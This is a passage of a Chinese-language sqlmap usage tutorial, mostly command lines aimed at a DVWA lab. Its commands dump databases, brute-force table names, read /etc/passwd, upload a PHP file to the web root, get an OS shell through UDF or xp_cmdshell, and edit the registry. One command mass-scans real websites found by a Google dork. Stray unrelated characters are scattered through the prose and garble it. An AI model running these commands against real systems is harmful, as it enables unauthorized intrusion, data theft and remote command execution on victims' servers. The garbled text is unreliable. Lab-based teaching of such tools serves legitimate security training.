--batch 不詢問用戶選擇庶溶,全部使用默認選項
sqlmap.py -g "inurl:\".php?id=1\"" --proxy="http://127.0.0.1:25378" --batch ?使用此條語句可以批量掃描注入點
--count 獲取表中的數(shù)據(jù)個數(shù),一些敏感數(shù)據(jù)不能讀時可以使用此參數(shù)
root@kali:~# sqlmap -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=fiuptcba82h53qu2fqngtj9oj1" --count -D dvwa
--privileges 列出數(shù)據(jù)庫管理員權限机错,-U指定用戶(CU是當前用戶)
root@kali:~# sqlmap -u "http://192.168.80.161/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=16da84d6c533f3e25354fcf87c1310b0" --privileges -U CU
--dump-all ?獲取所有數(shù)據(jù)庫表的內(nèi)容
--exclude-sysdbs ?排除數(shù)據(jù)庫自帶的系統(tǒng)庫
root@kali:~# sqlmap -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=fiuptcba82h53qu2fqngtj9oj1" --dump-all --exclude-sysdbs
dump數(shù)據(jù)后,sqlmap為每個表生成一個CSV文件父腕。
--common-tables 暴力破解表名
以下3種情況弱匪,可以暴力破解表名:
? ? Mysql<5.0,沒有information_schema庫
? ? Mysql>=5.0璧亮,無權讀取information_schema庫
? ? 微軟的access數(shù)據(jù)庫萧诫,默認無權讀取MSysObjects庫
默認的字典文件 /usr/share/sqlmap/txt/common-tables.txt,可以手工指定
root@kali:~# sqlmap -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=fiuptcba82h53qu2fqngtj9oj1" --common-tables -D dvwa
--common-columns ?暴力破解列名
默認的字典文件/usr/share/sqlmap/txt/common-columns.txt
root@kali:~# sqlmap -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=fiuptcba82h53qu2fqngtj9oj1" --common-columns -T users -D dvwa
--udf-inject 注入用戶自定義函數(shù)
--shared-lib=SHLIB 共享庫的本地路徑
當我們需要在服務器上執(zhí)行系統(tǒng)命令時枝嘶,sqlmap默認會把DBMS內(nèi)置的庫文件經(jīng)過編譯后帘饶,上傳到服務器上,在服務器上基于編譯后的庫文件進行自定義函數(shù)的編寫群扶,編寫的自定義函數(shù)就是我們通常所說的UDF及刻。利用UDF實現(xiàn)對目標服務器特殊功能的操作,例如執(zhí)行系統(tǒng)命令等竞阐。
不同操作系統(tǒng)動態(tài)鏈接庫不同缴饭。windows是dll、linux是shared object
MYSQL的版本不同udf導出的路徑不同:
小于5.1版本:c:/windows
大于5.1版本:../lib/plugin
--file-read? 從數(shù)據(jù)庫服務器中讀取文件
root@kali:~# sqlmap -u "http://192.168.80.161/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=16da84d6c533f3e25354fcf87c1310b0" --file-read="/etc/passwd"
讀取后骆莹,保存到本機/root/.sqlmap/output/192.168.80.161/files/_etc_passwd
--file-write颗搂、--file-dest? 把文件上傳到數(shù)據(jù)庫服務器中
sqlmap.py -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4pq76dua60ghqc807869jrb9v2" --file-write="d:/dante.php" --file-dest="C:/phpStudy/WWW/dvwa/dante.php"
--sql-shell ?執(zhí)行數(shù)據(jù)庫命令
--os-shell、--os-cmd ?執(zhí)行操作系統(tǒng)命令
Mysql和postgresql汪疮,sqlmap上傳一個二進制庫峭火,并生成自定義函數(shù)sys_exec()、sys_eval()智嚷,也就是UDF卖丸。
Mssql,sqlmap調(diào)用xp_cmdshell存儲過程盏道,在SQL Server 2005及以上版本默認禁制xp_cmdshell稍浆,sqlmap會重新啟用它,如果不存在猜嘱,會自動創(chuàng)建衅枫。
root@kali:~# sqlmap -u "http://192.168.80.22/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=di9fbv68slla7sb0nncrm0v5m1" --os-cmd="ipconfig"
root@kali:~# sqlmap -u "http://192.168.80.22/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=di9fbv68slla7sb0nncrm0v5m1" --os-shell
--reg-read 讀取注冊表值
--reg-add 寫入注冊表值
--reg-del 刪除注冊表值
--reg-key,--reg-value朗伶,--reg-data弦撩,--reg-type 注冊表輔助選項
sqlmap -u http://1.1.1.1/a.php?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1